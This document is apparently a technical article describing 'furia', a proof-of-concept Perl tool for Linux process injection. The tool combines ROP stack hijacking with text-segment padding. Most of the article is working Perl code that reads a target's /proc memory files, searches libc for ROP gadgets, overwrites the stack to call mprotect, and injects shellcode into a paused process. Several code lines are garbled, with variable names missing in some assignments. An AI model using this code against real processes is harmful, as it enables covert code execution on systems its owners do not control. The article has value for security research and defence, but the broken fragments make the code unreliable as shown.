Furia
An approach for process injection with Perl.Last revision: april 15th, 2025.
- Introduction
- ROP stack hijacking
- ROP stack hijacking meets Text segment padding
- Implementation
- Get start address of memory regions
- Get available padding bytes
- Get stack return address
- Find ROP gadgets
- process_vm_writev syscall
- Overwrite stack to change memory permissions
- Write shellcode and restart execution
- Future work
1. Introduction
The usual approach for process injection in Linux involves overwriting memory of a process with a shellcode, executing such payload while the process is running, and then restoring the execution flow of the injected process. The manipulation of other processes memory can be achieved by using ptrace and process_vm_writev syscalls, or by interacting directly with the proc file system. These methods require having the same UID of the user running the process or have root access in the system. A detailed writeup on how to use and combine these methods can be found in The Definitive Guide to Linux Process Injection" by Akamai, which includes the "ROP stack hijacking" technique described as the first public demonstration of an injection technique that relies only on the process_vm_writev syscall. This article describes the implementation of furia, a proof-of-concept tool written in Perl for injecting code into a running process based on the ROP stack hijacking method. The motivation for this work is to explore the possibilites of process injection in Linux x86_64 using a toolset available by default in most distributions. In addition, to this date I'm not aware of any other public Perl artifacts intended to use the process_vm_writev syscall, much less use it for process injection. Source code of furia can be found here.
2. ROP stack hijacking
The idea behind the stack hijacking technique is to take control of the execution flow of a process without modifying any executable memory or registers. However, for it to be usable there must be a jump to a shellcode residing in the executable memory. Since most memory regions don't have both write and execution permissions, the approach is to write the shellcode in a writable memory region and then make it executable. This can be achieved by combining the stack hijacking technique and return-oriented programming, overwriting the process stack with a ROP chain that uses executable gadgets already present in the process memory. A step-by-step description and C code can be found in The Definitive Guide to Linux Process Injection.
3. ROP stack hijacking meets Text segment padding
The ROP stack hijacking technique described before overwrites the process writable memory without restoring its previous content, although the Akamai article does provides some guidelines for process recovery. This article presents an alternative approach that consists in using the Text Segment Padding technique for injecting a shellcode into the available padding bytes of the text segment. To achieve this the executable memory region must be first marked as writable by hijacking the stack and then proceed with the steps for writing and executing the shellcode in memory. Then process recovery can be obtained by jumping to the process entry point which would restart the execution flow of the main program. The steps are as follows:
- Find process entry point and available padding bytes in executable memory.
- Identify a stack return address from the process executable region.
- Pause process execution (SIGSTOP).
- Construct ROP chain to call mprotect and mark padding bytes writable.
- Overwrite process stack (at the return address) to place the ROP chain.
- Continue process execution (SIGCONT).
- Identify new stack return address from the process executable region.
- Pause process execution again (SIGSTOP).
- Write payload address in available padding bytes (after .fini).
- Write jmp instruction after payload to return to process entry point.
- Overwrite process stack (at new return address) to place payload address.
- Continue process execution (SIGCONT).
This modified version of the ROP stack hijacking technique is not ideal but is enough for a proof-of-concept tool.
4. Implementation
Relevant parts of the implementation will be discussed in this section. Most of the code for steps of the ROP stack hijacking technique is similar to the original C implementation published by Akamai. The rest is either new or taken from previous work I've done.
4.1 Get start address of memory regions
The start addresses of different memory regions and external libraries are used throughout the injection process. To obtain these addresses the get_start_addr subroutine parses the maps file of the target process searching for the first occurence of a given pattern. For example, to get the base address of the process a simple search for the pattern r-- can be performed. Similarly, the start address of the process executable region can be found using the pattern r-x and the base address of libc by using the pattern libc.
sub get_start_addr { my $pid = shift; my $pattern = shift; open my $FH, '<', "/proc/$pid/maps" or die "[-] $!\n"; my $start_addr; foreach my $line(<$FH>) { if($line =~ /$pattern/mg) { $start_addr = (split("-", $line))[0]; last; } } close $FH; return $start_addr; } [...] [...] my $base_addr = (strtol(get_start_addr($pid, "r--"), 16))[0]; [...] my $libc_base = (strtol(get_start_addr($pid, "libc"), 16))[0]; [...] my $rx_addr = (strtol(get_start_addr($pid, "r-x"), 16))[0];
4.2 Get available padding bytes
The existence of available padding bytes is calculated as the remaining space between .rodata and .fini sections. The first step then is to find the .fini section in the process binary. After the ELF header is read from the exe file in procfs, a SEEK operation is performed to the start of the section headers table using the value $e_shoff. Then the first 18 entries (of size $e_shentsize) in the section header table are read and unpacked. The .fini section is found by checking for the first section after the 15th entry with $sh_flags = 6 (AX) and $sh_addralign = 4. After finding .fini, the next section (.rodata) is read to calculate the size of the padding bytes. Finally, the get_fini_padding subroutine returns the size of available padding bytes, as well as the process entry point and the offset for the shellcode ($sh_offset + $sh_size of .fini). This approach is based on House of Pain: A practical approach for an x86-64 ELF virus., sections 3.3, 5.5 and 5.6.
sub get_fini_padding { my $pid = shift; open my $FH, '<', "/proc/$pid/exe" or die "[-] $!\n"; # read elf header read $FH, my $buff, 64; my = unpack("C a a a C12 S2 I q3 I S6", $buff); # skip non-elfs if($e[0] != 127 && $e[1] !~ 'E' && $e[2] !~ "L" && $e[3] !~ "F") { die "[-] executable doesn't look like a valid elf\n"; } my ($sh_flags, $sh_offset, $sh_size, $sh_addralign); my ($e_entry, $e_shoff, $e_shentsize) = ($e[19], $e[21], $e[26]); seek $FH, $e_shoff, 0; for(my $i = 0; $i < 18; $i++) { read $FH, my $buff, $e_shentsize; my = unpack("I2 q4 I2 q2", $buff); ($sh_flags, $sh_addralign) = ($u[2], $u[8]); # first sh_flags=6 && sh_addralign=4 after 15th entry should be .fini if($sh_flags == 6 && $sh_addralign == 4 && $i>15) { ($sh_offset, $sh_size) = ($u[4], $u[5]) if(!$sh_offset); } # .fini was found last if($sh_offset); } die "[-] .fini not found\n" if(!$sh_offset); # read next section header entry (.rodata) read $FH, my $buff, $e_shentsize; my = unpack("I2 q4 I2 q2", $buff); close $FH; # free space: .rodata sh_offset - (.fini sh_offset + .fini sh_size) my $padding_bytes = $u[4] - ($sh_offset + $sh_size); return ($e_entry, $padding_bytes, $sh_offset + $sh_size); } [..] [...] my ($entry, $padding_bytes, $offset) = get_fini_padding($pid); [...] if($padding_bytes < length($payload) + 5) { printf("[-] not enough space for injecting the payload. aborting...\n"); }
4.3 Get stack return address
The next step is to find an address within the range of the process executable memory for returning to the stack. This is achieved first by extracting the last but one entry from the process syscall file, which corresponds to the process stack pointer. The memory file is then parsed starting at the stack pointer offset, reading 8 bytes at a time and checking if the read value is an address within the range of the process executable memory. The first match is returned.
sub get_stack_pointer { my $pid = shift; open my $FH, '<', "/proc/$pid/syscall" or die "[-] $!\n"; my $line = <$FH>; close $FH; my = split(" ", $line); return $syscalls[$#syscalls - 1]; } [...] sub get_stack_ret_addr { my $pid = shift; my $text_addr = shift; my $text_size = 4096; my $stack_pointer = (strtol(get_stack_pointer($pid), 16))[0]; printf("[+] found stack pointer 0x%x\n", $stack_pointer); open my $FH, '<', "/proc/$pid/mem" or die "[-] $!\n"; seek $FH, $stack_pointer, 0; while((read $FH, my $buff, 8)) { $buff = unpack("Q", $buff); $stack_pointer += 8; if(($buff > $text_addr) && (($buff - $text_addr) < $text_size)) { $stack_pointer -= 8; return $stack_pointer; } } close $FH; return 0; } [...] my $stack_ret_addr = get_stack_ret_addr($pid, $rx_addr);
4.4 Find ROP gadgets
The C implementation of the ROP stack hijacking technique uses hardcoded values for the ROP gadgets; furia, on the other hand, searches for gadgets inside libc.so by parsing the shared object file one byte at a time (starting at offset $e_shoff) and then checking for the existence of a RET instruction (e.g. 0xc3). If found, the previous read byte is also checked to see if it's one of the gadgets used in the ROP chain: pop rax, pop rdi, pop rsi, pop rdx. If any of these gadgets is found then the offset is stored for future use. The search ends when all four gadgets are found.
# opcodes for ROP gadgets (x86_64) my %OPS = ( "pop_rax" => 0x58, "pop_rdx" => 0x5a, "pop_rsi" => 0x5e, "pop_rdi" => 0x5f, "ret" => 0xc3 ); # addresses of ROP gadgets found my %GADGETS = ( "pop_rax" => 0, "pop_rdx" => 0, "pop_rsi" => 0, "pop_rdi" => 0 ); [...] [...] [...] sub find_gadgets { my $libc = (DynaLoader::dl_findfile("libc.so.6"))[0]; print "[+] found libc at $libc\n"; open my $FH, '<', "$libc" or die "[-] $!\n"; # read elf header read $FH, my $buff, 64; my = unpack("C a a a C12 S2 I q3 I S6", $buff); my $e_shoff = $e[19]; # skipt false positives in header information seek $FH, $e_shoff, 0; print "[+] searching for gadgets...\n"; my ($gadgets, $offset, $curr, $prev) = (0, $e_shoff, 0x0, 0x0); while((read $FH, $curr, 1)) { $offset++; $curr = unpack("C", $curr); # lazy check # check for OPCODE + RET (e.g. pop rax; ret -- \x58\xc3) if($curr == $OPS{"ret"}) { if(!$GADGETS{"pop_rax"} && $prev == $OPS{"pop_rax"} ) { $GADGETS{"pop_rax"} = $offset - 2; printf("[+] found 'pop rax' at 0x%x\n", $GADGETS{"pop_rax"}); $gadgets++; } elsif(!$GADGETS{"pop_rdi"} && $prev == $OPS{"pop_rdi"} ) { $GADGETS{"pop_rdi"} = $offset - 2; printf("[+] found 'pop rdi' at 0x%x\n", $GADGETS{"pop_rdi"}); $gadgets++; } elsif(!$GADGETS{"pop_rsi"} && $prev == $OPS{"pop_rsi"} ) { $GADGETS{"pop_rsi"} = $offset - 2; printf("[+] found 'pop rsi' at 0x%x\n", $GADGETS{"pop_rsi"}); $gadgets++; } elsif(!$GADGETS{"pop_rdx"} && $prev == $OPS{"pop_rdx"} ) { $GADGETS{"pop_rdx"} = $offset - 2; printf("[+] found 'pop rdx' at 0x%x\n", $GADGETS{"pop_rdx"}); $gadgets++; } } $prev = $curr; last if($gadgets == 4); } close $FH; } find_gadgets(); my $pop_rax = get_hex_addr($libc_base + $GADGETS{"pop_rax"}); my $pop_rdi = get_hex_addr($libc_base + $GADGETS{"pop_rdi"}); my $pop_rsi = get_hex_addr($libc_base + $GADGETS{"pop_rsi"}); my $pop_rdx = get_hex_addr($libc_base + $GADGETS{"pop_rdx"}); my $syscall = get_hex_addr($libc_base + 0x00000000001019e0);
Another gadget used in the ROP chain is the mprotect syscall, which can also be found in the libc shared object by parsing its headers, however, for the initial version of "furia" this value is obtained by using readelf (example):
$ readelf -s /usr/lib/x86_64-linux-gnu/libc.so.6 | grep mprotect 2046: 00000000001019e0 33 FUNC WEAK DEFAULT 16 mprotect@.2.5
5.5 process_vm_writev syscall
The process_vm_writev syscall is defined as a function expecting six arguments, including two struct iovec pointers (local_iov and remote_iov):
ssize_t process_vm_writev(pid_t pid, const struct iovec *local_iov, unsigned long liovcnt, const struct iovec *remote_iov, unsigned long riovcnt, unsigned long flags);
Similarly, iovec is defined as a struct with two values, a void pointer iov_base for the starting memory address and a size_t for iov_len, the number of bytes to transfer:
struct iovec { void *iov_base; /* Starting address */ size_t iov_len; /* Number of bytes to transfer */ };
While Perl provides a native interface for calling syscalls, it doesn't provide native data structures to handle C structs. However, the struct values for process_vm_writev can be built by simply packing and concatenating the iovec data together. For strings values in iov_base the data is packed as a pointer to a string ("p" template) and for integer values the data is packed as a pointer to an integer ("Q" template and get_iv subroutine). In practice, only the iov_base pointer of the local_iov struct can contain pointers to strings or integers, remote_iov seem to always contain pointers to integers.
sub call_writev { my $pid = shift; my $local_arg = shift; my $local_type = shift; my $local_size = shift; my $remote_arg = shift; my $remote_size = shift; my $liovcnt = 1; my $riovcnt = 1; my $flags = 0; my ($local, $remote); $local = pack("$local_type", $local_arg); $local .= pack("Q", $local_size); $remote = pack("Q", $remote_arg); $remote .= pack("Q", $remote_size); syscall(311, $pid, $local, $liovcnt, $remote, $riovcnt, $flags); }
4.6 Overwrite stack to change memory permissions
All things ready, the process is paused and the stack is overwritten at the stack return address with the instructions to call mprotect for making the executable section writable. Then a signal is sent to the process to continue execution.
print "[+] trying to stop process with PID $pid\n"; kill 'SIGSTOP', $pid; # pop rdi - address -> rdi writev_ptr($pid, $pop_rdi, 8, $stack_ret_addr, 8); $stack_ret_addr += 8; writev_ptr($pid, $rx_addr_hex, 8, $stack_ret_addr, 8); $stack_ret_addr += 8; writev_ptr($pid, $pop_rsi, 8, $stack_ret_addr, 8); $stack_ret_addr += 8; writev_int($pid, get_iv($region_size), 8, $stack_ret_addr, 8); $stack_ret_addr += 8; # pop rdx - 07 -> rdx writev_ptr($pid, $pop_rdx, 8, $stack_ret_addr, 8); $stack_ret_addr += 8; writev_int($pid, get_iv($prot_rwx), 8, $stack_ret_addr, 8); $stack_ret_addr += 8; # pop rax - 10 -> rax writev_ptr($pid, $pop_rax, 8, $stack_ret_addr, 8); $stack_ret_addr += 8; writev_int($pid, get_iv($mprotect_syscall), 8, $stack_ret_addr, 8); $stack_ret_addr += 8; print "[+] calling mprotect\n"; writev_ptr($pid, $syscall, 8, $stack_ret_addr, 8); $stack_ret_addr += 8; writev_ptr($pid, $entry_hex, 8, $stack_ret_addr, 8); $stack_ret_addr += 8; # continue process and wait a few seconds for the stack kill 'SIGCONT', $pid; sleep 1;
4.7 Jump back to entry point
Program execution is restored by making a relative jump to the process entry point (appended after the shellcode). This jump is calculated as the difference between the entry point and the .fini offset + length of the payload + 5 (1 byte for the jmp instruction and 4 bytes for the relative address).
my $dist = $offset + length($payload) + 5 - $entry; my $dist = -$dist & 0xffffffff; my $jmp = "\xe9".pack("V", $dist); $payload = $payload.$jmp;
4.8 Write shellcode and restart execution
Finally, the process is paused once again and the shellcode is injected in the available padding bytes. The stack is overwritten with the address of the injected shellcode and then a signal is sent to the process to continue execution.
kill 'SIGSTOP', $pid; # new return to stack my $stack_ret_addr = get_stack_ret_addr($pid, $rx_addr); printf("[+] found new stack ret addr at 0x%x\n", $stack_ret_addr); print "[+] writing payload to rwx padding bytes\n"; writev_ptr($pid, $payload, length($payload), $target_addr, length($payload)); writev_ptr($pid, $target_addr_hex, 8, $stack_ret_addr, 8); # let the chips fall where they may kill 'SIGCONT', $pid;
5. Future work
The work described in this article is enough for a proof-of-concept tool. Some aspects that needs to be improved or changed in the future are:
- Injection doesn't always work smoothly. Sometimes it causes segmentation fault.
- Process is restarted (jump back to its entry point) each time the stack is hijacked. This means that the execution flow is restored but the original state of the process is lost.
- The search algorithm for stack return addresses is straightforward and works in the tested binaries. Injection of other complex programs might require more elaborated search algorithms.
- For simplicity, the size of the text section is considered to be 4096 (one page).This number should be calculated based on te actual size of the executable memory region.